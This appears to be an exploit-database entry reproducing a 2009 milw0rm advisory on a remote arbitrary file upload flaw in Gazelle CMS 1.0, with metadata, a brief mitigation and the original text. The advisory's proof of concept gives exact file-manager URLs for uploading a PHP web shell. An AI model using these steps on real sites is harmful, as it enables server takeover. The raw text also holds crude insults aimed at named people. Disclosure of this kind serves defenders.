header-logo
Suggest Exploit
vendor:
Gazelle CMS
by:
RoMaNcYxHaCkEr
7,5
CVSS
HIGH
Remote Arbitrary File Upload
264
CWE
Product Name: Gazelle CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:anantasoft:gazelle_cms:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln

Gazelle CMS 1.0 is vulnerable to a remote arbitrary file upload vulnerability. An attacker can exploit this vulnerability by sending a malicious file to the vulnerable server and then accessing it via a web browser. This can be done by changing the 'Type' parameter in the URL from 'Image' to 'File' and then uploading the malicious file. The malicious file can then be accessed via the URL http://localhost/Ananta_Gazelle1.0/user/File/shell.php

Mitigation:

The vendor has not released a patch for this vulnerability. It is recommended to disable the file upload feature or restrict access to the vulnerable URL.
Source

Exploit-DB raw data:

   ====================================================
   | Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln  
   |     My Home Page : WwW.Sec-Code.CoM
   |        Founded By RoMaNcYxHaCkEr            
   ====================================================
 
[!] Discovered.:                        RoMaNcYxHaCkEr

[!] Vendor.....:                        http://www.anantasoft.com/index.php?Gazelle%20CMS/Download

[!] My Homepage...:                     WwW.Sec-Code.CoM

[!] Security - Codes Group ...:         aB0-3tH4b T3rR0r , mr-al7rbi , sniper-code

[!] Contact Me ...:                     rXh@Mail.Net.Sa
 
[!] PoC........:
 
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image
^^^^
This Is Default In Editor admin
Try Change Image To File Like This :
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File
Upload Any Shell.php Then You See That,s Here E.G. :
http://localhost/Ananta_Gazelle1.0/user/File/shell.php
 
[!] Solution...:     I Don,t Know He He :D , Contact With Me ;)
 
[!] Greetingz..:     All My Forum Members , My TeaM , Dexter Franklin ;)
 
[!] Thx .. :            طالب متحمس , IHTTeam For His Exploit
 
[!] Fuck To .. : Third , Dev1l-Fucker <<< They Big Big Big Big Lamerz
 
[!] rXh
 
[!] bEST wISHES

# milw0rm.com [2009-08-13]